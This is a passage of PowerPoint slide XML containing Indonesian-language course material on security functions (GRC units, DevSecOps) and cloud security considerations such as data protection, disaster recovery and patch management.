            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Governance, Risk, and Compliance (GRC) unit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>Fokus pada kepatuhan, manajemen risiko, dan keamanan data sensitif.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemiliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khawatir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketegangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> divisi TI dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> (atau Information Security Office / Security Operations with collaboration focus), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjembatani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Dev) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Ops), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyatukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IT dan programmer.</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122966048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Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "di Internet" yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merugikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cermat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sangatlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirilis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
